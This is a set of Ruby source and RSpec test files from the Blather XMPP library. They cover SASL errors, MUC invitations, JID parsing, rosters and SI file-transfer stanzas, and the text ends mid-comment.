<file_sep>/spec/blather/errors/sasl_error_spec.rb
require 'spec_helper'
# Build a SASL <failure/> node wrapping a child element of the given
# error-condition name (RFC 6120 SASL errors).
def sasl_error_node(err_name = 'aborted')
  node = Blather::XMPPNode.new 'failure'
  node.namespace = Blather::SASLError::SASL_ERR_NS

  node << Blather::XMPPNode.new(err_name, node.document)
  node
end

describe Blather::SASLError do
  it 'can import a node' do
    expect(Blather::SASLError).to respond_to :import
    e = Blather::SASLError.import sasl_error_node
    expect(e).to be_kind_of Blather::SASLError
  end

  describe 'each XMPP SASL error type' do
    # Dashed condition names must map to underscored symbols on import.
    %w[ aborted
        incorrect-encoding
        invalid-authzid
        invalid-mechanism
        mechanism-too-weak
        not-authorized
        temporary-auth-failure
    ].each do |error_type|
      it "handles the name for #{error_type}" do
        e = Blather::SASLError.import sasl_error_node(error_type)
        expect(e.name).to eq(error_type.gsub('-','_').to_sym)
      end
    end
  end
end
<file_sep>/lib/blather/stanza/pubsub_owner/delete.rb
module Blather
class Stanza
class PubSubOwner

  # # PubSubOwner Delete Stanza
  #
  # [XEP-0060 Section 8.4 Delete a Node](http://xmpp.org/extensions/xep-0060.html#owner-delete)
  #
  # @handler :pubsub_delete
  class Delete < PubSubOwner

    register :pubsub_delete, :delete, self.registered_ns

    # Create a new delete stanza
    #
    # @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
    # @param [String] host the host to send the request to
    # @param [String] node the name of the node to delete
    def self.new(type = :set, host = nil, node = nil)
      new_node = super(type, host)
      new_node.node = node
      new_node
    end

    # Get the name of the node to delete
    #
    # @return [String]
    def node
      delete_node[:node]
    end

    # Set the name of the node to delete
    #
    # @param [String] node
    def node=(node)
      delete_node[:node] = node
    end

    # Get or create the actual delete node on the stanza
    #
    # @return [Blather::XMPPNode]
    def delete_node
      unless delete_node = pubsub.find_first('ns:delete', :ns => self.class.registered_ns)
        self.pubsub << (delete_node = XMPPNode.new('delete', self.document))
        delete_node.namespace = self.pubsub.namespace
      end
      delete_node
    end
  end # Delete
end # PubSubOwner
end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/message/muc_user_spec.rb
require 'spec_helper'
# Fixture: mediated MUC invitation message with <invite/>, <reason/> and a
# room <password/> (XEP-0045).
def muc_invite_xml
<<-XML
<message
from='<EMAIL>'
id='nzd143v8'
to='<EMAIL>'>
<x xmlns='http://jabber.org/protocol/muc#user'>
<invite to='<EMAIL>' from='<EMAIL>/desktop'>
<reason>
Hey Hecate, this is the place for all good witches!
</reason>
</invite>
<password><PASSWORD></password>
</x>
</message>
XML
end

# Fixture: invitation decline message carrying a <decline/> with a reason.
def muc_decline_xml
<<-XML
<message
from='hecate@shakespeare.lit/broom'
id='jk2vs61v'
to='<EMAIL>'>
<x xmlns='http://jabber.org/protocol/muc#user'>
<decline to='<EMAIL>' from='<EMAIL>'>
<reason>
Sorry, I'm too busy right now.
</reason>
</decline>
</x>
</message>
XML
end
describe 'Blather::Stanza::Message::MUCUser' do
  # The muc#user <x/> payload is created eagerly and recreated on demand.
  it 'ensures a form node is present on create' do
    c = Blather::Stanza::Message::MUCUser.new
    expect(c.xpath('ns:x', :ns => Blather::Stanza::Message::MUCUser.registered_ns)).not_to be_empty
  end

  it 'ensures a form node exists when calling #muc' do
    c = Blather::Stanza::Message::MUCUser.new
    c.remove_children :x
    expect(c.xpath('ns:x', :ns => Blather::Stanza::Message::MUCUser.registered_ns)).to be_empty

    expect(c.muc_user).not_to be_nil
    expect(c.xpath('ns:x', :ns => Blather::Stanza::Message::MUCUser.registered_ns)).not_to be_empty
  end

  it 'ensures the message type is :normal' do
    m = Blather::Stanza::Message::MUCUser.new
    expect(m.normal?).to eq(true)
  end

  it "must be able to set the password" do
    muc_user = Blather::Stanza::Message::MUCUser.new
    expect(muc_user.password).to eq(nil)
    muc_user.password = '<PASSWORD>'
    expect(muc_user.password).to eq('<PASSWORD>')
    muc_user.password = '<PASSWORD>'
    expect(muc_user.password).to eq('<PASSWORD>')
  end

  it "should not be an #invite?" do
    muc_user = Blather::Stanza::Message::MUCUser.new
    expect(muc_user.invite?).to eq(false)
  end

  describe "with an invite element" do
    it "should be an #invite?" do
      muc_user = Blather::XMPPNode.parse(muc_invite_xml)
      expect(muc_user.invite?).to eq(true)
    end

    it "should know the invite attributes properly" do
      muc_user = Blather::XMPPNode.parse(muc_invite_xml)
      expect(muc_user).to be_instance_of Blather::Stanza::Message::MUCUser
      invite = muc_user.invite
      expect(invite.to).to eq('<EMAIL>')
      expect(invite.from).to eq('<EMAIL>/desktop')
      expect(invite.reason).to eq('Hey Hecate, this is the place for all good witches!')
      expect(muc_user.password).to eq('<PASSWORD>')
    end

    it "must be able to set the to jid" do
      muc_user = Blather::Stanza::Message::MUCUser.new
      invite = muc_user.invite
      expect(invite.to).to eq(nil)
      invite.to = '<EMAIL>'
      expect(invite.to).to eq('<EMAIL>')
    end

    it "must be able to set the from jid" do
      muc_user = Blather::Stanza::Message::MUCUser.new
      invite = muc_user.invite
      expect(invite.from).to eq(nil)
      invite.from = '<EMAIL>'
      expect(invite.from).to eq('<EMAIL>')
    end

    it "must be able to set the reason" do
      muc_user = Blather::Stanza::Message::MUCUser.new
      invite = muc_user.invite
      expect(invite.reason).to eq('')
      invite.reason = 'Please join'
      expect(invite.reason).to eq('Please join')
    end
  end

  describe "with a decline element" do
    it "should be an #invite_decline?" do
      muc_user = Blather::XMPPNode.parse(muc_decline_xml)
      expect(muc_user).to be_instance_of Blather::Stanza::Message::MUCUser
      expect(muc_user.invite_decline?).to eq(true)
    end

    it "should know the decline attributes properly" do
      muc_user = Blather::XMPPNode.parse(muc_decline_xml)
      decline = muc_user.decline
      expect(decline.to).to eq('<EMAIL>')
      expect(decline.from).to eq('<EMAIL>')
      expect(decline.reason).to eq("Sorry, I'm too busy right now.")
    end

    it "must be able to set the to jid" do
      muc_user = Blather::Stanza::Message::MUCUser.new
      decline = muc_user.decline
      expect(decline.to).to eq(nil)
      decline.to = '<EMAIL>'
      expect(decline.to).to eq('<EMAIL>')
    end

    it "must be able to set the from jid" do
      muc_user = Blather::Stanza::Message::MUCUser.new
      decline = muc_user.decline
      expect(decline.from).to eq(nil)
      decline.from = '<EMAIL>'
      expect(decline.from).to eq('<EMAIL>')
    end

    it "must be able to set the reason" do
      muc_user = Blather::Stanza::Message::MUCUser.new
      decline = muc_user.decline
      expect(decline.reason).to eq('')
      decline.reason = 'Please join'
      expect(decline.reason).to eq('Please join')
    end
  end
end
<file_sep>/lib/blather/stanza/message/muc_user.rb
require 'blather/stanza/muc/muc_user_base'

module Blather
class Stanza
class Message

  # # MUC User Message
  #
  # A <message/> stanza carrying an <x/> payload in the
  # http://jabber.org/protocol/muc#user namespace: mediated room
  # invitations and invitation declines (XEP-0045).
  class MUCUser < Message
    include Blather::Stanza::MUC::MUCUserBase

    register :muc_user_message, :x, "http://jabber.org/protocol/muc#user"

    # Create a new MUCUser message; message type defaults to :normal.
    def self.new(to = nil, body = nil, type = :normal)
      super
    end

    # Does the payload contain an <invite/> element?
    #
    # @return [true, false]
    def invite?
      !!find_invite_node
    end

    # Does the payload contain a <decline/> element?
    #
    # @return [true, false]
    def invite_decline?
      !!find_decline_node
    end

    # The <invite/> child, created if not already present
    #
    # @return [Invite]
    def invite
      if invite = find_invite_node
        Invite.new invite
      else
        muc_user << (invite = Invite.new nil, nil, nil, self.document)
        invite
      end
    end

    # @private
    def find_invite_node
      muc_user.find_first 'ns:invite', :ns => self.class.registered_ns
    end

    # The <decline/> child, created if not already present
    #
    # @return [Decline]
    def decline
      if decline = find_decline_node
        Decline.new decline
      else
        muc_user << (decline = Decline.new nil, nil, nil, self.document)
        decline
      end
    end

    # @private
    def find_decline_node
      muc_user.find_first 'ns:decline', :ns => self.class.registered_ns
    end

    # Shared implementation for <invite/> and <decline/> children: both
    # carry to/from attributes and an optional <reason/> child element.
    class InviteBase < XMPPNode
      # Build a node, accepting an existing instance, a raw XML node, an
      # attribute hash, or positional to/from/reason values.
      def self.new(element_name, to = nil, from = nil, reason = nil, document = nil)
        new_node = super element_name, document
        case to
        when self
          to.document ||= document
          return to
        when Nokogiri::XML::Node
          new_node.inherit to
        when Hash
          new_node.to = to[:to]
          new_node.from = to[:from]
          new_node.reason = to[:reason]
        else
          new_node.to = to
          new_node.from = from
          new_node.reason = reason
        end
        new_node
      end

      def to
        read_attr :to
      end

      def to=(val)
        write_attr :to, val
      end

      def from
        read_attr :from
      end

      def from=(val)
        write_attr :from, val
      end

      # The reason text with surrounding whitespace stripped
      def reason
        reason_node.content.strip
      end

      def reason=(val)
        reason_node.content = val
      end

      # The <reason/> child, created if not already present
      def reason_node
        unless reason = find_first('ns:reason', :ns => MUCUser.registered_ns)
          self << (reason = XMPPNode.new('reason', self.document))
        end
        reason
      end
    end

    class Invite < InviteBase
      def self.new(*args)
        # FIX: dropped a useless assignment to an unused local (new_node)
        super :invite, *args
      end
    end

    class Decline < InviteBase
      def self.new(*args)
        # FIX: dropped a useless assignment to an unused local (new_node)
        super :decline, *args
      end
    end
  end # MUCUser
end # Message
end # Stanza
end # Blather
<file_sep>/lib/blather/jid.rb
module Blather

# Jabber ID or JID
#
# See [RFC 3920 Section 3 - Addressing](http://xmpp.org/rfcs/rfc3920.html#addressing)
#
# An entity is anything that can be considered a network endpoint (i.e., an
# ID on the network) and that can communicate using XMPP. All such entities
# are uniquely addressable in a form that is consistent with RFC 2396 [URI].
# For historical reasons, the address of an XMPP entity is called a Jabber
# Identifier or JID. A valid JID contains a set of ordered elements formed
# of a domain identifier, node identifier, and resource identifier.
#
# The syntax for a JID is defined below using the Augmented Backus-Naur Form
# as defined in [ABNF]. (The IPv4address and IPv6address rules are defined
# in Appendix B of [IPv6]; the allowable character sequences that conform to
# the node rule are defined by the Nodeprep profile of [STRINGPREP] as
# documented in Appendix A of this memo; the allowable character sequences
# that conform to the resource rule are defined by the Resourceprep profile
# of [STRINGPREP] as documented in Appendix B of this memo; and the
# sub-domain rule makes reference to the concept of an internationalized
# domain label as described in [IDNA].)
#
#     jid             = [ node "@" ] domain [ "/" resource ]
#     domain          = fqdn / address-literal
#     fqdn            = (sub-domain 1*("." sub-domain))
#     sub-domain      = (internationalized domain label)
#     address-literal = IPv4address / IPv6address
#
# All JIDs are based on the foregoing structure. The most common use of this
# structure is to identify an instant messaging user, the server to which
# the user connects, and the user's connected resource (e.g., a specific
# client) in the form of <user@host/resource>. However, node types other
# than clients are possible; for example, a specific chat room offered by a
# multi-user chat service could be addressed as <room@service> (where "room"
# is the name of the chat room and "service" is the hostname of the
# multi-user chat service) and a specific occupant of such a room could be
# addressed as <room@service/nick> (where "nick" is the occupant's room
# nickname). Many other JID types are possible (e.g., <domain/resource>
# could be a server-side script or service).
#
# Each allowable portion of a JID (node identifier, domain identifier, and
# resource identifier) MUST NOT be more than 1023 bytes in length, resulting
# in a maximum total size (including the '@' and '/' separators) of 3071
# bytes.
class JID
  include Comparable

  # Validating pattern for JID string
  PATTERN = /^(?:([^@]*)@)??([^@\/]*)(?:\/(.*?))?$/.freeze

  attr_reader :node,
              :domain,
              :resource

  # @private
  def self.new(node, domain = nil, resource = nil)
    node.is_a?(JID) ? node : super
  end

  # Create a new JID object
  #
  # @overload initialize(jid)
  #   Passes the jid object right back out
  #   @param [Blather::JID] jid a jid object
  # @overload initialize(jid)
  #   Creates a new JID parsed out of the provided jid
  #   @param [String] jid a jid in the standard format
  #   ("node@domain/resource")
  # @overload initialize(node, domain = nil, resource = nil)
  #   Creates a new JID
  #   @param [String] node the node of the JID
  #   @param [String, nil] domain the domain of the JID
  #   @param [String, nil] resource the resource of the JID
  # @raise [ArgumentError] if the parts of the JID are too large (1023 bytes)
  # @return [Blather::JID] a new jid object
  def initialize(node, domain = nil, resource = nil)
    @resource = resource
    @domain = domain
    @node = node

    # Only a single argument given: parse it as a full JID string.
    if @domain.nil? && @resource.nil?
      @node, @domain, @resource = @node.to_s.scan(PATTERN).first
    end

    raise ArgumentError, 'Node too long' if (@node || '').length > 1023
    raise ArgumentError, 'Domain too long' if (@domain || '').length > 1023
    raise ArgumentError, 'Resource too long' if (@resource || '').length > 1023
  end

  # Turn the JID into a string
  #
  # * ""
  # * "domain"
  # * "node@domain"
  # * "domain/resource"
  # * "node@domain/resource"
  #
  # @return [String] the JID as a string
  def to_s
    s = @domain
    s = "#{@node}@#{s}" if @node
    s = "#{s}/#{@resource}" if @resource
    s
  end

  # Returns a new JID with resource removed.
  #
  # @return [Blather::JID] a new JID without a resource
  def stripped
    dup.strip!
  end

  # Removes the resource (sets it to nil)
  #
  # @return [Blather::JID] the JID without a resource
  def strip!
    @resource = nil
    self
  end

  # Compare two JIDs, helpful for sorting etc.
  #
  # String representations are compared case-insensitively, see JID#to_s
  #
  # @param [#to_s] other a JID to comare against
  # @return [Fixnum<-1, 0, 1>]
  def <=>(other)
    to_s.downcase <=> other.to_s.downcase
  end
  alias_method :eql?, :==

  # Hash the JID
  #
  # FIX: #eql? is aliased to the case-insensitive #== above, so #hash must
  # also be case-insensitive, otherwise equal JIDs hash to different
  # buckets and misbehave as Hash keys / Set members.
  #
  # @return [Integer]
  def hash
    to_s.downcase.hash
  end

  # Test if JID is stripped
  #
  # @return [true, false]
  def stripped?
    @resource.nil?
  end
end # JID

end # Blather
<file_sep>/spec/blather/stanza_spec.rb
require 'spec_helper'
# Specs for the base Blather::Stanza class: handler registration, node
# import, reply generation and the id/to/from/type accessors.
describe Blather::Stanza do
it 'provides .next_id helper for generating new IDs' do
expect { Blather::Stanza.next_id }.to change Blather::Stanza, :next_id
end
it 'provides a handler registration mechanism' do
class Registration < Blather::Stanza; register :handler_test, :handler, 'test:namespace'; end
expect(Registration.handler_hierarchy).to include :handler_test
expect(Blather::Stanza.handler_list).to include :handler_test
end
it 'can register based on handler' do
class RegisterHandler < Blather::Stanza; register :register_handler; end
expect(Blather::Stanza.class_from_registration(:register_handler, nil)).to eq(RegisterHandler)
end
it 'can register based on given name' do
class RegisterName < Blather::Stanza; register :handler, :registered_name; end
expect(Blather::Stanza.class_from_registration(:registered_name, nil)).to eq(RegisterName)
end
it 'can register subclass handlers' do
class SuperClassRegister < Blather::Stanza; register :super_class; end
class SubClassRegister < SuperClassRegister; register :sub_class; end
expect(SuperClassRegister.handler_hierarchy).not_to include :sub_class
expect(SubClassRegister.handler_hierarchy).to include :super_class
end
it 'can import a node' do
s = Blather::Stanza.import Blather::XMPPNode.new('foo')
expect(s.element_name).to eq('foo')
end
it 'provides an #error? helper' do
s = Blather::Stanza.new('message')
expect(s.error?).to eq(false)
s.type = :error
expect(s.error?).to eq(true)
end
# #reply must return a new stanza with to/from swapped; #reply! converts
# the receiver in place.
it 'will generate a reply' do
s = Blather::Stanza.new('message')
s.from = f = Blather::JID.new('n@d/r')
s.to = t = Blather::JID.new('d@n/r')
r = s.reply
expect(r.object_id).not_to equal s.object_id
expect(r.from).to eq(t)
expect(r.to).to eq(f)
end
it 'convert to a reply' do
s = Blather::Stanza.new('message')
s.from = f = Blather::JID.new('n@d/r')
s.to = t = Blather::JID.new('d@n/r')
r = s.reply!
expect(r.object_id).to eq(s.object_id)
expect(r.from).to eq(t)
expect(r.to).to eq(f)
end
it 'does not remove the body when replying' do
s = Blather::Stanza.new('message')
s.from = f = Blather::JID.new('n@d/r')
s.to = t = Blather::JID.new('d@n/r')
s << Blather::XMPPNode.new('query', s.document)
r = s.reply
expect(r.children.empty?).to eq(false)
end
it 'removes the body when replying if we ask to remove it' do
s = Blather::Stanza.new('message')
s.from = f = Blather::JID.new('n@d/r')
s.to = t = Blather::JID.new('d@n/r')
s << Blather::XMPPNode.new('query', s.document)
r = s.reply :remove_children => true
expect(r.children.empty?).to eq(true)
end
# Attribute accessors mirror the underlying XML attributes; reading via
# [] returns the raw attribute string, the method form returns rich types
# (e.g. Blather::JID for to/from).
it 'provides "attr_accessor" for id' do
s = Blather::Stanza.new('message')
expect(s.id).to be_nil
expect(s[:id]).to be_nil
s.id = '123'
expect(s.id).to eq('123')
expect(s[:id]).to eq('123')
end
it 'provides "attr_accessor" for to' do
s = Blather::Stanza.new('message')
expect(s.to).to be_nil
expect(s[:to]).to be_nil
s.to = Blather::JID.new('n@d/r')
expect(s.to).not_to be_nil
expect(s.to).to be_kind_of Blather::JID
expect(s[:to]).not_to be_nil
expect(s[:to]).to eq('n@d/r')
end
it 'provides "attr_accessor" for from' do
s = Blather::Stanza.new('message')
expect(s.from).to be_nil
expect(s[:from]).to be_nil
s.from = Blather::JID.new('n@d/r')
expect(s.from).not_to be_nil
expect(s.from).to be_kind_of Blather::JID
expect(s[:from]).not_to be_nil
expect(s[:from]).to eq('n@d/r')
end
it 'provides "attr_accessor" for type' do
s = Blather::Stanza.new('message')
expect(s.type).to be_nil
expect(s[:type]).to be_nil
s.type = 'testing'
expect(s.type).not_to be_nil
expect(s[:type]).not_to be_nil
end
it 'can be converted into an error by error name' do
s = Blather::Stanza.new('message')
err = s.as_error 'internal-server-error', 'cancel'
expect(err.name).to eq(:internal_server_error)
end
end
<file_sep>/spec/blather/roster_item_spec.rb
require 'spec_helper'

# Specs for Blather::RosterItem: construction from the various JID
# representations, subscription/ask validation, stanza generation and
# presence (status) bookkeeping.
describe Blather::RosterItem do
  it 'can be initialized with Blather::JID' do
    # BUGFIX: the original spec read `jid = Blather::JID.new(jid)`, which
    # passes the still-nil local `jid` to JID.new and so tested nothing.
    # Use a concrete JID and, consistent with the sibling specs below,
    # expect the item to hold the stripped form.
    jid = Blather::JID.new('n@d/r')
    i = Blather::RosterItem.new jid
    expect(i.jid).to eq(jid.stripped)
  end

  it 'can be initialized with an Iq::RosterItem' do
    jid = 'n@d/r'
    i = Blather::RosterItem.new Blather::Stanza::Iq::Roster::RosterItem.new(jid)
    expect(i.jid).to eq(Blather::JID.new(jid).stripped)
  end

  it 'can be initialized with a string' do
    jid = 'n@d/r'
    i = Blather::RosterItem.new jid
    expect(i.jid).to eq(Blather::JID.new(jid).stripped)
  end

  it 'returns the same object when intialized with a Blather::RosterItem' do
    control = Blather::RosterItem.new 'n@d/r'
    expect(Blather::RosterItem.new(control)).to be control
  end

  it 'has a Blather::JID setter that strips the Blather::JID' do
    jid = Blather::JID.new('n@d/r')
    i = Blather::RosterItem.new nil
    i.jid = jid
    expect(i.jid).to eq(jid.stripped)
  end

  it 'has a subscription setter that forces a symbol' do
    i = Blather::RosterItem.new nil
    i.subscription = 'remove'
    expect(i.subscription).to eq(:remove)
  end

  it 'forces the type of subscription' do
    expect { Blather::RosterItem.new(nil).subscription = 'foo' }.to raise_error Blather::ArgumentError
  end

  it 'returns :none if the subscription field is blank' do
    expect(Blather::RosterItem.new(nil).subscription).to eq(:none)
  end

  it 'ensure #ask is a symbol' do
    i = Blather::RosterItem.new(nil)
    i.ask = 'subscribe'
    expect(i.ask).to eq(:subscribe)
  end

  it 'forces #ask to be :subscribe or nothing at all' do
    expect { Blather::RosterItem.new(nil).ask = 'foo' }.to raise_error Blather::ArgumentError
  end

  it 'generates a stanza with #to_stanza' do
    jid = Blather::JID.new('n@d/r')
    i = Blather::RosterItem.new jid
    s = i.to_stanza
    expect(s).to be_kind_of Blather::Stanza::Iq::Roster
    expect(s.items.first.jid).to eq(jid.stripped)
  end

  it 'returns status based on priority' do
    setup_item_with_presences
    expect(@i.status).to eq(@p3)
  end

  it 'returns status based on priority and state' do
    setup_item_with_presences
    # An unavailable presence must never win, even with the top priority
    @p4 = Blather::Stanza::Presence::Status.new
    @p4.type = :unavailable
    @p4.from = 'n@d/d'
    @p4.priority = 15
    @i.status = @p4
    expect(@i.status).to eq(@p3)
  end

  it 'returns status based on resource' do
    setup_item_with_presences
    expect(@i.status('a')).to eq(@p)
  end

  # Attach three statuses (resources a/b/c with priorities 0/-1/10) to a
  # fresh roster item for the status-selection specs above.
  def setup_item_with_presences
    @jid = Blather::JID.new('n@d/r')
    @i = Blather::RosterItem.new @jid
    @p = Blather::Stanza::Presence::Status.new(:away)
    @p.from = 'n@d/a'
    @p.priority = 0
    @p2 = Blather::Stanza::Presence::Status.new(:dnd)
    @p2.from = 'n@d/b'
    @p2.priority = -1
    @p3 = Blather::Stanza::Presence::Status.new(:dnd)
    @p3.from = 'n@d/c'
    @p3.priority = 10
    @i.status = @p
    @i.status = @p2
    @i.status = @p3
  end

  it 'removes old unavailable presences' do
    setup_item_with_presences
    50.times do |i|
      p = Blather::Stanza::Presence::Status.new
      p.type = :unavailable
      p.from = "n@d/#{i}"
      @i.status = p
    end
    # 3 available statuses + only the most recent unavailable one
    expect(@i.statuses.size).to eq(4)
  end

  it 'initializes groups to [nil] if the item is not part of a group' do
    i = Blather::RosterItem.new 'n@d'
    expect(i.groups).to eq([nil])
  end

  it 'can determine equality' do
    item1 = Blather::RosterItem.new 'n@d'
    item2 = Blather::RosterItem.new 'n@d'
    item1.groups = %w[group1 group2]
    item2.groups = %w[group1 group2]
    expect(item1 == item2).to eq(true)
  end
end
<file_sep>/spec/blather/roster_spec.rb
require 'spec_helper'
# Specs for Blather::Roster: construction from a roster stanza, processing
# roster pushes (add/remove), item lookup, enumeration and grouping.
describe Blather::Roster do
before do
# Stub stream and stanza; the four RosterItems share the bare JID "n@d"
# (only the resource differs), so the roster collapses them to one entry.
@stream = mock()
@stream.stubs(:write)
@stanza = mock()
items = 4.times.map { |n| Blather::Stanza::Iq::Roster::RosterItem.new(jid: "n@d/#{n}r") }
@stanza.stubs(:items).returns(items)
@stanza.stubs(:version).returns('24d091d0dcfab1b3')
@roster = Blather::Roster.new(@stream, @stanza)
end
it 'initializes with items' do
expect(@roster.items.map { |_,i| i.jid.to_s }).to eq(@stanza.items.map { |i| i.jid.stripped.to_s }.uniq)
end
it 'processes @stanzas with remove requests' do
s = @roster['n@d/0r']
s.subscription = :remove
expect { @roster.process(s.to_stanza) }.to change(@roster, :length).by -1
end
it 'processes @stanzas with add requests' do
s = Blather::Stanza::Iq::Roster::RosterItem.new('a@b/c').to_stanza
expect { @roster.process(s) }.to change(@roster, :length).by 1
end
it 'allows a jid to be pushed' do
jid = 'a@b/c'
expect { @roster.push(jid) }.to change(@roster, :length).by 1
expect(@roster[jid]).not_to be_nil
end
it 'allows an item to be pushed' do
jid = 'a@b/c'
item = Blather::RosterItem.new(Blather::JID.new(jid))
expect { @roster.push(item) }.to change(@roster, :length).by 1
expect(@roster[jid]).not_to be_nil
end
it 'aliases #<< to #push and returns self to allow for chaining' do
jid = 'a@b/c'
item = Blather::RosterItem.new(Blather::JID.new(jid))
jid2 = 'd@e/f'
item2 = Blather::RosterItem.new(Blather::JID.new(jid2))
expect { @roster << item << item2 }.to change(@roster, :length).by 2
expect(@roster[jid]).not_to be_nil
expect(@roster[jid2]).not_to be_nil
end
# The mock client asserts #write is called exactly once (mocha expectation)
it 'sends a @roster addition over the wire' do
client = mock(:write => nil)
roster = Blather::Roster.new client, @stanza
roster.push('a@b/c')
end
it 'removes a Blather::JID' do
expect { @roster.delete 'n@d' }.to change(@roster, :length).by -1
end
it 'sends a @roster removal over the wire' do
client = mock(:write => nil)
roster = Blather::Roster.new client, @stanza
roster.delete('a@b/c')
end
it 'returns an item through []' do
item = @roster['n@d']
expect(item).to be_kind_of Blather::RosterItem
expect(item.jid).to eq(Blather::JID.new('n@d'))
end
it 'responds to #each' do
expect(@roster).to respond_to :each
end
it 'cycles through all the items using #each' do
expect(@roster.map { |i| i }.sort).to eq(@roster.items.values.sort)
end
it 'yields RosterItems from #each' do
@roster.map { |i| expect(i).to be_kind_of Blather::RosterItem }
end
it 'returns a duplicate of items through #items' do
items = @roster.items
items.delete 'n@d'
expect(items).not_to equal @roster.items
end
it 'will group roster items' do
@roster.delete 'n@d'
item1 = Blather::RosterItem.new("n1@d")
item1.groups = ['group1', 'group2']
item2 = Blather::RosterItem.new("n2@d")
item2.groups = ['group1', 'group3']
@roster << item1 << item2
expect(@roster.grouped).to eq({
'group1' => [item1, item2],
'group2' => [item1],
'group3' => [item2]
})
end
it 'has a version' do
expect(@roster.version).to eq @stanza.version
end
end
<file_sep>/lib/blather/stanza/iq/si.rb
require 'time' # For Time#xmlschema
module Blather
class Stanza
class Iq
# # Si Stanza
#
# [XEP-0096: SI File Transfer](http://xmpp.org/extensions/xep-0096.html)
#
# This is a base class for any si based Iq stanzas. It provides a base set
# of methods for working with si stanzas
#
# @example Basic file transfer acceptance
#     client.register_handler :file_transfer do |iq|
#       transfer = Blather::FileTransfer.new(client, iq)
#       transfer.accept(Blather::FileTransfer::SimpleFileReceiver, "/path/to/#{iq.si.file["name"]}", iq.si.file["size"].to_i)
#     end
#
# @example Basic file transfer refusal
#     client.register_handler :file_transfer do |iq|
#       transfer = Blather::FileTransfer.new(client, iq)
#       transfer.decline
#     end
#
# @example File transfer acceptance by in-band bytestreams with custom handler
#     client.register_handler :file_transfer do |iq|
#       transfer = Blather::FileTransfer.new(client, iq)
#       transfer.allow_ibb = true
#       transfer.allow_s5b = false
#       transfer.accept(MyFileReceiver, iq)
#     end
#
# @handler :file_transfer
class Si < Iq
# @private
NS_SI = 'http://jabber.org/protocol/si'
register :file_transfer, :si, NS_SI
# Overrides the parent method to ensure a si node is created
#
# @see Blather::Stanza::Iq.new
def self.new(type = :set)
node = super
# Touching #si forces the <si/> child to be created via find_or_create
node.si
node
end
# Overrides the parent method to ensure the current si node is destroyed
#
# @see Blather::Stanza::Iq#inherit
def inherit(node)
# Drop our auto-created si child first so only the inherited node's si
# remains after super copies its children — presumably; confirm against
# XMPPNode#inherit semantics.
si.remove
super
end
# Find or create si node
#
# @return [Si::Si]
def si
Si.find_or_create self
end
# Replaces si node
#
# @param [Si::Si, XML::Node] node the stanza's new si node
#
# @return [Si::Si]
def si=(node)
# Remove the existing si child, append the replacement, then re-find it
# so the returned value is wrapped as a Si::Si
si.remove
self << node
Si.find_or_create self
end
# Overrides the parent method to ensure the current si node is destroyed
#
# @see Blather::Stanza#reply
def reply
# The reply should not carry the request's si payload
reply = Stanza::Iq::Si.import super
reply.si.remove
reply
end
# Si stanza fragment
class Si < XMPPNode
# Create a new Si::Si object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Si::Si]
def self.new(node = nil)
new_node = super :si
new_node.namespace = NS_SI
new_node.inherit node if node
new_node
end
# Find or create si node in Si Iq and converts it to Si::Si
#
# @param [Si] parent a Si Iq where to find or create si
#
# @return [Si::Si]
def self.find_or_create(parent)
# NOTE(review): '//ns:si' searches from the document root, not just
# under `parent` — confirm this is intended for multi-stanza documents.
if found_si = parent.find_first('//ns:si', :ns => NS_SI)
si = self.new found_si
found_si.remove
else
si = self.new
end
parent << si
si
end
# Get the id of the stream
#
# @return [String, nil]
def id
read_attr :id
end
# Set the id
#
# @param [String, nil] id the id of the stream
def id=(id)
write_attr :id, id
end
# Get the MIME type of the stream
#
# @return [String, nil]
def mime_type
read_attr 'mime-type'
end
# Set the MIME type
#
# @param [String, nil] type the MIME type of the stream
def mime_type=(type)
write_attr 'mime-type', type
end
# Get the profile of the stream
#
# @return [String, nil]
def profile
read_attr :profile
end
# Set the profile
#
# @param [String, nil] profile the profile of the stream
def profile=(profile)
write_attr :profile, profile
end
# Find or create file node
#
# @return [Si::Si::File]
def file
File.find_or_create self
end
# Find or create feature node
#
# @return [Si::Si::Feature]
def feature
Feature.find_or_create self
end
# Feature stanza fragment
class Feature < XMPPNode
register :feature, 'http://jabber.org/protocol/feature-neg'
# Create a new Si::Si::Feature object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Si::Si::Feature]
def self.new(node = nil)
new_node = super :feature
new_node.namespace = self.registered_ns
new_node.inherit node if node
new_node
end
# Find or create feature node in si node and converts it to Si::Si::Feature
#
# @param [Si::Si] parent a si node where to find or create feature
#
# @return [Si::Si::Feature]
def self.find_or_create(parent)
# Re-wrap an existing feature node so it carries this class's helpers;
# the XPath searches from the document root (see Si.find_or_create)
if found_feature = parent.find_first('//ns:feature', :ns => self.registered_ns)
feature = self.new found_feature
found_feature.remove
else
feature = self.new
end
parent << feature
feature
end
# Find or create x node
#
# @return [Stanza::X]
def x
Stanza::X.find_or_create self
end
end
# File stanza fragment
class File < XMPPNode
register :file, 'http://jabber.org/protocol/si/profile/file-transfer'
# Create a new Si::Si::File object
#
# @param [XML::Node, nil] node a node to inherit from
#
# @return [Si::Si::File]
def self.new(name = nil, size = nil)
new_node = super :file
# First argument doubles as either a node to inherit or a filename
case name
when Nokogiri::XML::Node
new_node.inherit name
else
new_node.name = name
new_node.size = size
end
new_node
end
# Find or create file node in si node and converts it to Si::Si::File
#
# @param [Si::Si] parent a si node where to find or create file
#
# @return [Si::Si::File]
def self.find_or_create(parent)
if found_file = parent.find_first('//ns:file', :ns => self.registered_ns)
file = self.new found_file
found_file.remove
else
file = self.new
end
parent << file
file
end
# Get the filename
#
# @return [String, nil]
def name
read_attr :name
end
# Set the filename
#
# @param [String, nil] name the name of the file
def name=(name)
write_attr :name, name
end
# Get the hash
#
# NOTE(review): this shadows Object#hash with a String (or nil), so File
# nodes will misbehave as Hash/Set keys. The name mirrors the XEP-0096
# "hash" attribute and is part of the public API, so it is kept as-is.
#
# @return [String, nil]
def hash
read_attr :hash
end
# Set the hash
#
# @param [String, nil] hash the MD5 hash of the file
def hash=(hash)
write_attr :hash, hash
end
# Get the date
#
# Returns nil when the date attribute is absent or is not valid
# xs:dateTime (as parsed by Time.xmlschema).
#
# @return [Time, nil]
def date
  # Guard the nil case explicitly: Time.xmlschema(nil) raises TypeError,
  # which the former bare `rescue ArgumentError` did not catch, so a
  # missing attribute raised instead of returning the documented nil.
  if (d = read_attr(:date))
    begin
      Time.xmlschema(d)
    rescue ArgumentError
      nil
    end
  end
end
# Set the date
#
